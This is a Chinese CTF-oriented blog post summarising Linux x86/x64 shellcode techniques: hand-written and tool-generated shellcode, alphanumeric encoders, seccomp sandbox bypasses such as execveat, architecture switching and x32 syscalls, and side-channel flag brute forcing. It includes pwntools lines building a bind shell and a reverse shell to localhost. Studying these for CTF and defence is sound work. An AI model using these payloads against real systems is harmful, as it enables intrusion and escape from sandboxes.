roderick 收录于 pwn-trick

2023-02-20 约 6100 字预计阅读 13 分钟 - 次阅读

对shellcode知识点的一些总结。

relax and learn…

1-如何编写shellcode
2-突破沙箱规则
3-字符型shellcode
4-shellcode编写技巧
参考

本文尽可能地全面地总结有关shellcode的知识点。目前重点关注linux系统用户态的x86汇编指令。持续更新中……
本文只将现有有关shellcode的知识点提炼出来，没有做细致地解释与分析，不会涉及到具体的例题。若师傅们有疑问可以在评论中提出……

可以在Bilibili上观看视频进行学习：

或者在Youtube上观看视频进行学习：

1-如何编写shellcode

shellcode是一段可被CPU直接执行的程序码。

使用shellcode进行攻击是一项经典而强大的技术，借助shellcode几乎可以完成任何事情，包括但不限于泄露敏感信息、反弹shell、布置后门等。

编写shellcode的方式有很多，而方式的选择取决于实际场景。如当需要编写复杂的shellcode的时候，需要手搓；当需要注入特定模板的shellcode时，可以采用工具生成；当需要观察shellcode的字符、长度时，可以采用在线网站生成。

1-1 纯手搓

学到最后，你会发现还是会回归到最原始的方式：手搓shellcode。

1-1-1 纯汇编

如果使用gcc编译，模板如下：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


;#gcc -c start.s -o start.o
;#ld -e _start -z noexecstack start.o -o start

    ;// 使用intel语法
    .intel_syntax noprefix
    .text
    .globl  _start
    .type   _start, @function
_start:
    ;// SYS_exit
    mov rdi, 0
    mov rax, 60
    syscall

也可以使用nasm，只是编译的命令不一样。

1-1-2 内联汇编

有时候需要调用一下库函数，可以使用内联汇编Extended Asm (Using the GNU Compiler Collection (GCC))，直接在程序中使用asm(...);编写内联汇编语句。

但是在剥离shellcode的时候，需要将call xxxxxxxx的偏移进行修正。

1-1-3 使用tiny_libc

为了快速、高效、准确地编写出复杂的shellcode，我参考了musl库实现了一个简单的libc库，姑且称之为tiny_libc，项目地址在CVE-ANALYZE/tiny_libc at main · RoderickChan/CVE-ANALYZE (github.com)。

实现了一些基本的系统调用函数、字符串操作函数，glibc常用函数，比如：system、popen、sleep、strcpy、memcpy、puts等等。编译时不依赖任何其他库文件，编译后text段的大小基本不会超过1 page。

在main.c中编写程序逻辑。如果需要剥离出shellcode，执行get_shellcode.py文件即可在当前目录生成shellcode文件，然后读取该文件，直接输入给目标程序即可。

这个库当初是为了研究dirty pipe漏洞开发的，因为该漏洞不能写超过一页的shellcode。因此，需要编写复杂的shellcode，又不想写汇编的时候，可以用这个库直接写C，然后一键得到要注入的shellcode。

如在main.c写入如下内容：

1
2
3
4
5
6
7
8
9


#include "all_in_one.h"
//----------------------------------------------------

void _start()
{
	system("date");
	puts(popen_r("cat /etc/issue"));
	exit(0);
}

执行后输出为：

1
2
3
4
5


$ ./main
Wed Feb 19 21:19:43 CST 2023
Ubuntu 20.04.4 LTS \n \l
$ ldd main
        not a dynamic executable

可以很方便的剥离shellcode。

1-2 借助工具

1-2-1 pwntools的shellcraft

pwntools的shellcraft定义了非常多的模板，支持的架构有x86/x64/arm/arm64等等。

点击pwnlib.shellcraft — Shellcode generation — pwntools 4.10.0dev documentation进行学习。

使用的示例如下：

1
2
3
4
5
6
7


shellcode = asm(pwnlib.shellcraft.amd64.linux.bindsh(9999, 'ipv4')) # 绑定shell到999端口
shellcode = asm(pwnlib.shellcraft.amd64.linux.cat("/flag", 1)) # 读取/flag，输出到标准输出
shellcode = asm(pwnlib.shellcraft.amd64.linux.cat2("/flag", 1, 0x30)) # 读取/flag，输出到标准输出
shellcode = asm(pwnlib.shellcraft.amd64.linux.socket("ipv4", "tcp")+\
               pwnlib.shellcraft.amd64.linux.connect("127.0.0.1", 9999, 'ipv4')+\
               pwnlib.shellcraft.amd64.linux.dupsh('rax')
               ) # 反弹shell

1-2-2 alpha3

建议使用TaQini/alpha3: Automatically exported from code.google.com/p/alpha3 (github.com)这个版本。

使用需要指定基址寄存器：

1
2
3


python ./ALPHA3.py x64 ascii mixedcase rax --input="shellcode"
./shellcode_x64.sh rax
./shellcode_x86.sh eax

学习原文地址在Alphanumeric Shellcode：纯字符Shellcode生成指南 - FreeBuf网络安全行业门户。

1-2-3 AE64

另一位师傅写的可见字符编码的工具，地址在veritas501/ae64: basic amd64 alphanumeric shellcode encoder (github.com)，与上一个工具的比较如下：

以上两个工具都能生出x86/x64的shellcode，但是alpha3支持的选项更多一点，阅读两者的文档和使用示例即可熟练使用。

1-2-4 shellcode encoder

指这个工具：rcx/shellcode_encoder: x64 printable shellcode encoder (github.com)

没有前两个好用，有限考虑前两个工具。

1-2-5 msf生成

很多编码的方式，但是对可见字符的编码支持受限。只有x86支持字符编码。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50


Framework Encoders [--encoder <value>]
======================================

    Name                          Rank       Description
    ----                          ----       -----------
    cmd/brace                     low        Bash Brace Expansion Command Encoder
    cmd/echo                      good       Echo Command Encoder
    cmd/generic_sh                manual     Generic Shell Variable Substitution Command Encoder
    cmd/ifs                       low        Bourne ${IFS} Substitution Command Encoder
    cmd/perl                      normal     Perl Command Encoder
    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/eicar                 manual     The EICAR Encoder
    generic/none                  normal     The "none" Encoder
    mipsbe/byte_xori              normal     Byte XORi Encoder
    mipsbe/longxor                normal     XOR Encoder
    mipsle/byte_xori              normal     Byte XORi Encoder
    mipsle/longxor                normal     XOR Encoder
    php/base64                    great      PHP Base64 Encoder
    ppc/longxor                   normal     PPC LongXOR Encoder
    ppc/longxor_tag               normal     PPC LongXOR Encoder
    ruby/base64                   great      Ruby Base64 Encoder
    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
    x64/xor                       normal     XOR Encoder
    x64/xor_context               normal     Hostname-based Context Keyed Payload Encoder
    x64/xor_dynamic               normal     Dynamic key XOR Encoder
    x64/zutto_dekiru              manual     Zutto Dekiru
    x86/add_sub                   manual     Add/Sub Encoder
    x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
    x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
    x86/bloxor                    manual     BloXor - A Metamorphic Block Based XOR Encoder
    x86/bmp_polyglot              manual     BMP Polyglot
    x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder
    x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat              manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time              manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown                 normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha                  low        Non-Alpha Encoder
    x86/nonupper                  low        Non-Upper Encoder
    x86/opt_sub                   manual     Sub Encoder (optimised)
    x86/service                   manual     Register Service
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit         manual     Single Static Bit
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic               normal     Dynamic key XOR Encoder

1-3 在线网站

搜集了一些非常有用的与shellcode相关的网站

Online x86 and x64 Intel Instruction Assembler (defuse.ca): 在线编写shellcode和反汇编shellcode，目前只支持x86/x64
Online Assembler and Disassembler (shell-storm.org): 另一个更全的在线编写shellcode和反汇编shellcode网站
Shellcodes database for study cases (shell-storm.org): shellcode数据库，支持很多指令集与操作系统
Exploit Database Shellcodes (exploit-db.com): 另一个shellcode数据库
Online - Reverse Shell Generator (revshells.com): 生成反弹shell的命令

2-突破沙箱规则

由于沙箱规则比较多，规则制定比较自由，所以下文重点探讨绕过的技术。

2-1 使用at/v/2系统调用

这里分别指的是几个系统调用的后缀和前缀，比如：

使用execveat代替execve，拿到shell后，使用shell内置命令读取flag: echo *; read FLAG < /flag;echo $FLAG，否则使用子shell执行命令还是会被沙箱杀死。同样的，使用openat代替open。
使用readv/writev代替read/write
使用mmap2代替mmap
还有一些特殊的系统调用，使用sendfile，代替read/write。这类的系统调用需要平时多关注、收集和整理。

2-2 使用orw读取flag

一般来说，会禁止system/execve/fork等，这个时候使用open+read+write输出flag即可。

或者使用open+sendfile，指令会更短。

2-3 切换指令模式

随便找一个seccomp-tools解析的沙箱规则：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


$ seccomp-tools dump ./pwn
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x08 0xc000003e  if (A != ARCH_X86_64) goto 0010
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x06 0x00 0x40000000  if (A >= 0x40000000) goto 0010
 0004: 0x15 0x05 0x00 0x0000003b  if (A == execve) goto 0010
 0005: 0x15 0x04 0x00 0x00000142  if (A == execveat) goto 0010
 0006: 0x15 0x03 0x00 0x00000039  if (A == fork) goto 0010
 0007: 0x15 0x02 0x00 0x00000038  if (A == clone) goto 0010
 0008: 0x15 0x01 0x00 0x0000000f  if (A == rt_sigreturn) goto 0010
 0009: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0010: 0x06 0x00 0x00 0x00000000  return KILL

这个沙箱规则判断了当前触发系统调用的时候，arch是否为x64，如果不是64就会kill；然后，判断了sys-number是否大于等于0x40000000，如果大于，程序也会被kill；然后设置了黑名单，分别是：execve/execveat/fork/clone/rt_sigreturn。处于黑名单的系统调用会被kill掉，其他系统调用则会放行。

如果没有 0001: 0x15 0x00 0x08 0xc000003e if (A != ARCH_X86_64) goto 0010这一句的检查，那么可以使用retf(return far)指令实现架构切换，或者在x64环境下直接调用int 0x80陷入到内核态。

retf相当于pop ip; pop cs，cs是段寄存器，寄存器为0x23时表示32位运行模式，0x33表示64位运行模式。

从64位切换到32位的模板如下：

1
2
3
4
5
6
7


xor esp, esp
mov rsp, 0x400100
mov eax, 0x23 ; cs
mov [rsp+4], eax
mov eax, 0x400800 ; ip
mov [rsp], eax
retf

2-4 使用0x40000000+X系统调用

接着2-3，如果没有限制： 0003: 0x35 0x06 0x00 0x40000000 if (A >= 0x40000000) goto 0010的话，那么可以使用0x40000000 + X来执行系统调用。

1

#define __X32_SYSCALL_BIT	0x40000000UL

关于x32 ABI可查看x32 ABI - Wikipedia。

比如要执行read：

1
2
3
4
5
6


xor eax, eax
add eax, 0x40000000
xor edi, edi
mov rsi, rsp
mov edx, 0x300
syscall

需要注意的是，从5.16开始，linux内核不支持x32 abi了：Bug #1994516 “Kernels after 5.16 cannot execute x32-ABI binaries…” : Bugs : linux package : Ubuntu (launchpad.net)

2-5 使用 io_uring 系统调用

最近 io_uring 系统调用受到了广泛关注，因为这个系统调用几乎可抵千军万马。

特别的，高版本 (Linux Kernel Version >= 6.5) 的 io_uring 中引入了 IORING_SETUP_NO_MMAP 标志，配合 IORING_SETUP_SQPOLL 可以一次 syscall 完成 orw 操作。

3-字符型shellcode

3-1 可打印字符

关于ascii shellcode，这篇博客必看：Ascii shellcode - NetSec。

如果要求是可打印字符，直接使用上面提到的alpha3/ae64等工具生成即可。

3-2 字母和数字

同上，直接使用上面提到的alpha3/ae64等工具生成即可。

3-3 限制字母和数字

很多时候，会限制为纯小写字母或者部分字母或者部分数字。这个时候，需要根据限制条件，把能用的shellcode组合梳理出来，然后结合shellcode的执行地址，利用xor/add等指令，构造出其他所需要的指令。

举个例子，假如shellcode执行地址0x333100，只能用0x30-0x40编写shellcode，如果需要\x0f\x05，可以用异或：

1
2
3


xor eax, 0x33333130; 3530313333
xor eax, 0x3333343f; 353f343333
;此时，eax就成为0x050f了

可以用pwntools的disasm爆破所有可能的shellcode组合：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


import itertools
from pwn import *

context.arch = "amd64"

s = "0123456789\x3a\x3b\x3c\x3d\x3e\x3f\x40"

for x in range(3):
    for y in itertools.product(s, repeat=x+1):
        res = disasm("".join(y).encode())
        need_p = 1
        for kk in  (".byte", "rex", "ds", "bad", "ss"):
            if kk in res:
                need_p = 0
                break
        if need_p:
            print(res)

然后根据需要进行组合即可。

字符型的shellcode要善于使用xor和add，善于借助已有的地址：

0000对应的是add [rax], al，借助溢出可以构造出任意的单字符出来
\x35XXXX，对应的是xor eax, XXXX
\x34X，对应的是xor al, X
\x31\x31对应的是xor [rax], esi
……

4-shellcode编写技巧

总结一下其他的shellcode编写技巧。

4-1 观察寄存器状态

最后执行shellcode的指令大概率是call/jmp等，用gdb调试的时候，在此处下个断点，观察寄存器的值。

一般来说寄存器会残留一些与程序相关的地址、变量等，合理的利用寄存器的值可以有效地减小shellcode的长度。

4-2 观察栈的状态

与观察寄存器的值是一样的，观察一下栈上有没有可以利用的地址或者变量。因为pop/push reg，一般是一个字节，非常的短。

4-3 使用更短的指令

要把rax清零，可以使用的指令有：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22


;6A0058
push 0
pop rax

; 5358 假设rbx为0
push rbx
pop rax

;48C7C000000000
mov rax, 0

; B800000000
mov eax, 0

;31C0
xor eax, eax

; 4893 假设rbx为0
xchg rax, rbx

;93 假设ebx为0
xchg eax, ebx

可以发现，这些指令的长度都不一样，那么我们应该结合当时的上下文环境选用最短的指令，指令越短，自由度越高。

怎么编写较短的指令，需要多积累多总结，比如：

尽量使用pop/push
尽量使用xor reg reg
尽量使用xchg
使用cdq将edx置零
······

4-4 构造read再次读入

很多时候由于第一次输入的shellcode长度受限，可以构造出read再输入一次shellcode，构造的方式有：

直接构造read(0, data, len)
构造socket+connnect+recv从远程读shellcode
构造从文件读shellcode
······

4-5 侧信道爆破内存

有时候不知道哪个内存是可读可写的，那么可以使用系统调用爆破内存。比如：

read
write
nanosleep
mprotect
……

这些系统调用，如果猜测的内存为非法地址，则系统调用会失败，然后返回负数，那么可以根据系统调用的返回值来判断是否内存爆破成功。

4-6 侧信道爆破flag

有时候1/2输出流被关闭了，又无法使用socket，就可以使用侧信道的当时来爆破。主要有几种方式：

使用cmp，如果判断正确，陷入循环或者read等，如果判断错误，触发异常
使用alarm，使用多线程的方式猜测每个字符（有时候不是很准）
使用mmap，在内存的末位存入字符，通过异常判断是否猜测正确
······

4-7 借助rax寄存器

rax寄存器存储系统调用号，也存储返回值。主要有两种方式:

上面提到的根据系统调用的返回值爆破内存等
利用read等返回值构造系统调用号

4-8 借助段寄存器

段寄存器可以拿到代码段、堆、栈等地址，如：

1

mov rbx, ds:[0x30]

还可以借助load effective address指令：

1

lea rsp, [rip]

适用于rsp为异常值但需要栈的情况。

4-9 ptrace注入

ptrace注入非常强大可以使用ptrace(attach, pid...)读写其他进程的reg或者data区域的内存内容，详细的技巧可以访问ptrace(2) - Linux manual page (man7.org)进行学习。

除此之外，还可以用lseek和open/read/write文件/proc/pid/mem，进而可以直接读写与修改某个进程的虚拟空间内存内容。

由于代码逻辑会比较复杂，推荐使用tiny_libc直接写C语言，之后剥离出shellcode。

4-10 多架构通用shellcode

指一段shellcode可以同时在x86/x64/arm/arm64/mips等架构上运行。可以阅读下面的博客：

主要思想是借助各个架构下的jmp指令：A的jmp是B的nop。就可以把A/B的shellcode放在一起了。

4-11 有限字符的shellcode

其实是一种shellcode的编码技巧，比如只用三个字符编码shellcode: 仅用三种字符实现 x86_64 架构的任意 shellcode-安全客 - 安全资讯平台 (anquanke.com)。

步骤仍然是：

找出各字符组合后可能的shellcode片段
根据已有的片段、上下文环境编码目标shellcode

4-12 寄存器全为0的syscall

一个没啥用的冷知识：当寄存器都是0的时候执行syscall，rcx会被赋值。

参考

Buy me a coffee~

赞赏

支付宝

微信

Linux下的shellcode技巧总结